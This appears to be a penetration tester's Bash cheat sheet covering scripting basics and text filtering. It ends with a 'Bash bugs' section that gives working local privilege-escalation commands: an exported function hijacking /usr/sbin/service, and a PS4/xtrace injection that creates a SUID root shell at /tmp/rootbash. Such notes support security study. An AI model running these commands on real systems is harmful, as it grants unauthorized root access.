Bash
alias
alias ..='cd ..'
alias ll='ls -la'
shebang #!
#! /bin/bash
make script executable
chmod +x hack.sh
execute file
./hack.sh
variables
TARGET=10.10.99.99
print variable
echo $TARGET
Arguments
#!/bin/bash
echo "Arg-1 $1 arg-2 $2"
Key | Value |
---|---|
$0 | The name of the Bash script |
$1 - $9 | The first 9 arguments to the Bash script |
$# | Number of arguments passed to the Bash script |
$@ | All arguments passed to the Bash script |
$? | The exit status of the most recently run process |
$$ | The process ID of the current script |
$USER | The username of the user running the script |
$HOSTNAME | The hostname of the machine |
$RANDOM | A random number |
$LINENO | The current line number in the script |
Assign arguments
#!/bin/bash
echo "What is your anme ?";
read name;
echo "Your name is $name";
Assign output
#!/bin/bash
user=$(whoami)
echo $user kali
If / Else / Elif
If (string)
#!/bin/bash
echo "Select scan XSS/SQLi";
read -p "Attack name:" action
if [ $action == 'XSS' ]; then
echo "XSS attack...";
fi
If (number)
#!/bin/bash
echo "Number of request";
read -p "Nr:" action
if [ $action -lt 10 ]; then
echo "< 10";
fi
if [ $action -eq 10 ]; then
echo "== 10";
fi
if [ $action -gt 10 ]; then
echo "> 10";
fi
If-Else
#!/bin/bash
echo "Number of request";
read -p "Nr:" action
if [ $action -eq 10 ]; then
echo "OK";
else
echo "No OK"
fi
If-ElseIf-Else
#!/bin/bash
echo "Number of request";
read -p "Nr:" action
if [ $action -eq 10 ]; then
echo "OK.1";
elif [ $action -eq 20 ]; then
echo "OK.2";
else
echo "No OK"
fi
Logical Operations
grep 'kali' /etc/passwd && echo "User exist"
grep 'john' /etc/passwd || echo "User NOT exist"
[ $(whoami) == 'kali' ] && echo "Not root user"
[ $(whoami) == 'root' ] && echo "Root user"
[ $(whoami) != 'root' ] || echo "Ah NOT ROOT"
For
#!/bin/bash
for ip in $(seq 1 10); do
echo 10.11.1.$ip;
done
#!/bin/bash
for ip in {1..10}; do
echo 10.11.1.$ip;
done
While
#!/bin/bash
index=1
while [ $index -le 5 ]
do
echo "10.10.10$index"
index=$(( $index + 1 ))
done
Function
#!/bin/bash
banner(){
echo "Super HaCkEr Engine";
}
banner;
banner;
sed
echo "I am Mr.Cat" | sed 's/Cat/Robot/'
cut
echo "root,lorem,password123,ipsum,/root" | cut -d"," -f1,3,5
# root,password123,/root
awk
cat /etc/passwd | awk -F: '{printf "USER--> %s\t HOME--> %s\n", $1, $6}'
piping
cat /etc/passwd | grep '/bin/false' | cut -d":" -f 1,6 | awk -F: '{printf "user: %s home:%s\n", $1, $2}'
cat /etc/passwd | grep '/bin/false' | awk -F: '{printf "user: %s home:%s\n", $1, $6}'
compare
diff
vimdiff
comm
download
wget
curl
axel
filter out some stuff
cat feroxbuster_80.txt | grep -v -E '.js|.css|.gif|.svg|.png|.jpg|.ttf|.eot|.woff|.md'
split by space, take 6 one , sort, unit, filter
cat feroxbuster_80.txt | awk '{print $6}' | sort | uniq | grep -v -E '.js|.css|.gif|.svg|.png|.jpg|.ttf|.eot|.woff|.md'
wipe all whitespace including newlines from file
cat file.txt | tr -d " \t\n\r"
Bash bugs
Bug in bash < 4.2-048
In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
/bin/bash --version
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service
if any binary is using for example /usr/sbin/service apache2 start
then with our function we can execute our code
Bash versions < 4.4
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:
/tmp/rootbash -p